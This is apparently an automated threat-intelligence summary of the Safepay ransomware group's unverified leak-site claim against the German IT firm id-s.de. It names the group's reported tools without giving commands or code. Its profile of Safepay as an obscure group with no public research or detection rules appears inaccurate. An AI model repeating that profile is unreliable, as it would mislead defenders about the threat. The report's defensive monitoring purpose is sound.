id-s.de Ransomware Attack by Safepay (May 2026)

Claim Summary

On May 6, 2026, the ransomware group known as Safepay posted a claim on their dark web leak site alleging a successful attack against id-s.de, a German technology company operating in digital technologies and IT-related services. According to the threat actor, they have exfiltrated data from the organization’s systems, though the volume of stolen information remains undisclosed. The group has not yet published any data samples or provided specific evidence to substantiate their claim.

This report is based solely on the leak site posting and has NOT been independently verified by Yazoul Security. Ransomware groups frequently exaggerate or fabricate claims to pressure victims into negotiations.

Threat Actor Profile

Safepay is a relatively obscure ransomware group with limited public track record. Based on available intelligence, the group has not been linked to a large number of confirmed victims, and no public research or YARA rules currently exist for their operations. This lack of visibility raises questions about their operational maturity and credibility.

The group’s known toolset includes:

• Invoke-ShareFinder: Used for network share enumeration and data discovery
• 7-Zip and WinRAR: Archive utilities for compressing stolen data
• CMSTPLUA: A Microsoft signed binary abused for privilege escalation
• dllhost.exe and Regsvr32.exe: Legitimate Windows processes weaponized for code execution and persistence

These tools suggest Safepay relies on living-off-the-land (LotL) techniques and publicly available utilities rather than custom malware. This approach can make detection more challenging but also indicates a lower technical sophistication compared to established groups like LockBit or BlackCat.

Alleged Data Exposure

According to the leak site, Safepay claims to have accessed and exfiltrated data from id-s.de’s systems. The group states that id-s.de is “a German company operating in the field of digital technologies and IT-related services,” but provides no further details on the nature or sensitivity of the stolen information.

Key unknowns:

• Data volume: Undisclosed
• Data types: Not specified (could include customer records, internal communications, source code, or financial documents)
• Proof of compromise: No samples or screenshots provided

The absence of evidence is notable. Established ransomware groups typically release proof-of-compromise files or screenshots to increase pressure on victims. Safepay’s failure to do so may indicate either a lack of actual access or a strategic decision to withhold evidence during early negotiation stages.

Potential Impact

If the claim is verified, the impact on id-s.de could include:

• Operational disruption: Potential downtime from encryption or system lockout
• Data breach liability: If customer or employee data was exfiltrated, regulatory obligations under GDPR may apply
• Reputational damage: Clients and partners may question the company’s security posture
• Financial costs: Ransom demands, forensic investigation, legal fees, and potential fines

Given id-s.de’s role in IT-related services, a breach could also affect downstream clients if the company manages third-party systems or data.

What to Watch For

• Leak site updates: Monitor for any data samples, screenshots, or ransom notes posted by Safepay
• Official statements: id-s.de may issue a public disclosure or notification to regulators
• Dark web chatter: Other threat actors may reference or repost any leaked data
• Detection guidance: As more intelligence on Safepay emerges, Yazoul Security will publish relevant YARA rules and detection signatures at /intel/

Disclaimer

This report is based on unverified claims made by the Safepay ransomware group on their dark web leak site. Yazoul Security has NOT independently confirmed the breach, data exfiltration, or any other details provided in this intelligence summary. Ransomware groups routinely fabricate or exaggerate claims to coerce victims into payment. Organizations should treat this information as unconfirmed until official verification is available. No PII, download links, or access credentials are included in this report.